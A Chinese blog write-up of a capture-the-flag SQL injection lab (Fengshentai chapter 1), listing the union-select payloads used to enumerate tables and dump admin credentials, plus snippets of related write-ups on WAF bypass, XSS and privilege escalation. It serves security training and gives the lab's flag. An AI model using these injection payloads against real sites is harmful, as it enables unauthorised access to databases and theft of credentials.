封神台靶场 第一章:为了女神小芳!writeup

最新推荐文章于 2024-08-05 22:58:41 发布
原创 最新推荐文章于 2024-08-05 22:58:41 发布 · 2.8w 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细记录了一次SQL注入攻击的过程,通过封神台靶场的第一章来展示。首先找到注入点,然后确定字段数、回显位置,接着暴露数据库名、表名和字段名,并最终获取字段值。通过一系列SQL语句,成功完成联合注入,获取到所需信息。此题帮助作者复习并巩固了联合注入的知识。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

封神台靶场 第一章:为了女神小芳!

目录

封神台靶场 第一章:为了女神小芳!

题目简述:

解题过程:

寻找注入点

查看字段数

查看回显位置

查看版本信息

爆数据库名

爆表名

爆字段名

获取字段值

总结

题目简述:

封神台靶场,题目链接

解题过程:

首先是这样的url为:

http://59.63.200.79:8003/

当点击点击查看新闻时,相应的url变化,变为如下:

http://59.63.200.79:8003/?id=1

寻找注入点

?id=1 and 1=1#   回显正常

?id=1 and 1=2#  回显异常

查看字段数

?id=1 order by 1,2#  回显正常

?id=1 order by 3#  回显异常

判断字段数为2

查看回显位置

得到回显位置为2

?id=20 union select 1,2#

查看版本信息

?id=20 union select 1,version()#

爆数据库名

?id=20 union select 1,database()#

爆表名

?id=20 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

爆字段名

猜测所要的信息在admin表中

?id=20 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#

获取字段值

?id=20 union select 1,group_concat(username,0x3a,password) from admin#

最后将hellohack作为flag提交即可。

总结

这个题目比较常规,算是又复习了一遍联合注入的知识,加深了印象。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2474
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
第一章:为了女神小芳
m0_59205095的博客
05-16 2348
第一章:为了女神小芳 通过sql注入拿到管理员密码!尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站 学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了 宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍 (aqlab.cn) 实验工具 sqlmap 实验环境 kali 1.判断是否存在注入点,页面显示如图所示可能存在sql注入点 http://rhiq8003.ia.aqlab.cn/?id=1and%
封神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 3149
封神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
封神台-靶场-第一章:为了女神小芳!(题解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1675
我们先来学习sql注入,
封神台——尤里的复仇Ⅰ 小芳
ASD830的博客
03-21 656
我们可以查出“admin“”表里 有 “id” “username” “password” 三个字段。题目说让我们拿到管理员账户的密码,我们看一下username和password字段的内容。尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站。根据提示我们需要浅浅的sql注入一下,首先判断一下是否存在SQL注入漏洞。学过一点黑客技术的他,想在女神面前炫炫技。页面不正常,说明存在SQL注入漏洞。页面出现了2,说明我们的回显位为2。页面不正常,判断出字段数为2。
mbp 封神台靶场 一(笔记)
热门推荐
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,里面提到了封神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网页出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
封神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!
正在学习的路上...
07-18 3700
1.找注入点 进去之后,查看新闻,一般在这里有注入点。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试没有过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
封神台 sql 注入靶场 writeup
白帽渗透笔记的博客
07-21 949
今天给大家带来封神台 sql 注入靶场前 4 关的解题思路,并不算难。 地址 https://hack.zkaq.cn/battle#bid=cd23d4b58f0dfd3e 0x01 首先判断是否存在注入点,修改地址,尝试 id=1 and 1=1 可以正常显示数据,id=1 and 1=2 无法显示数据,故存在注入。 继续猜解字段数,id=1 order by 1 可以正常显示数据,一直到 4 才无法显示,故字段数为 3,使用 id=1 and 1=2 union select 1,
【Vulnhub靶场】DRIPPING BLUES: 1 通关writeup
weixin_44588899的博客
05-17 797
环境 下载地址:https://download.vulnhub.com/drippingblues/drippingblues.ova.torrent 攻击机地址: 192.168.0.106 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.0.104 开始探测 nmap -T4 -p- -A 192.168.0.104 发现开放21、22、80端口,这里发现21可以匿名访问,还可以下载一个压缩包,下载打开需要密码 使用工具爆破密码 fcrackzip -D
2020YCBCTF:2020羊城杯官方writeup
03-24
2020年 2020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
---vulhub_Writeup:vulhub靶场个人writeup,转载引用请注明地址,坑点补充联系作者。
03-03
vulhub_Writeup 主要写一些个人在打vulhub靶场中自己遇到的问题和处理方法。作为分享与个人查询所用。 笔者从2020年11月开始自学网安,水平有限,如有问题,恳请指正。 电子邮件:
封神台在线靶场——第一章:为了女神小芳!
pigzlfa的博客
10-10 734
sql注入基础版。
封神台靶场 第一章:为了女神小芳 (SQL注入)
m0_65712192的博客
10-14 2313
封神台靶场 第一章:为了女神小芳 (SQL注入)
封神台靶场
m0_71518346的博客
10-18 864
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。
封神台靶场练习
最新发布
token_x的博客
08-05 588
封神台靶场练习,未完待补充
封神台靶场 | 布尔盲注 | Pass05-07
Fanny0602的博客
03-12 1715
封神台靶场 | 布尔盲注 题目地址: 掌控安全学院SQL注入靶场 文章目录       Pass05          盲注          盲注查询步骤       Pass06       Pass07 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass05 数据库查询语句: select * from news where id=1 盲注: 1.查询到的数据只会显示有数据/没有结果 2.可以用ASCII进行猜测 盲注查询步骤: 1.数据库名字长度 2.数据库库名 3.
封神台DOM XSS靶场
qq_40941912的博客
10-05 1101
作业 DOM XSS靶场 (Rank: 10) 在页面上可填写的地方都输入 Native编码: \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0032\u0033\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e 插入到url中,发现弹窗了: 此处的payload被当作代码执行了 把xss平台
封神台靶场 | 显错注入 | Pass01-04
Fanny0602的博客
03-05 1029
封神台靶场 | 显错注入 题目地址: 掌控安全学院SQL注入靶场 显错注入 Pass01 Pass02 Pass03 Pass04 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass01 数据库查询语句: select *from user where id=1 Pass02 数据库查询语句: select *from user where id=‘1’ Pass03 数据库查询语句: select *from user where id=(‘1’) Pass04 数据库查询语
封神台靶场-第六章
Mr_helloword的博客
07-11 1561
第六章-SYSTEM!POWER! Tips: 1、提权! 2、FLAG在C盘根目录下! 1.在第五章的基础上用菜刀连接,根据提示查看flag,发现没有权限,这里想到提权,这是本章重点( 注:如果中途出现掉线,重新连接菜刀,或重新上传木马连接) 2.上传cmd.exe,iis6.exe文件(在upfile这里上传这俩个文件) 3.打开cmd命令,想法:创建管理员组新用户成员,奈何权限低。 whoami查看当前用户:发现为web应用服务组成员,权限低 我们想到还有一个iis6,我们查看该用户发现为syst
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值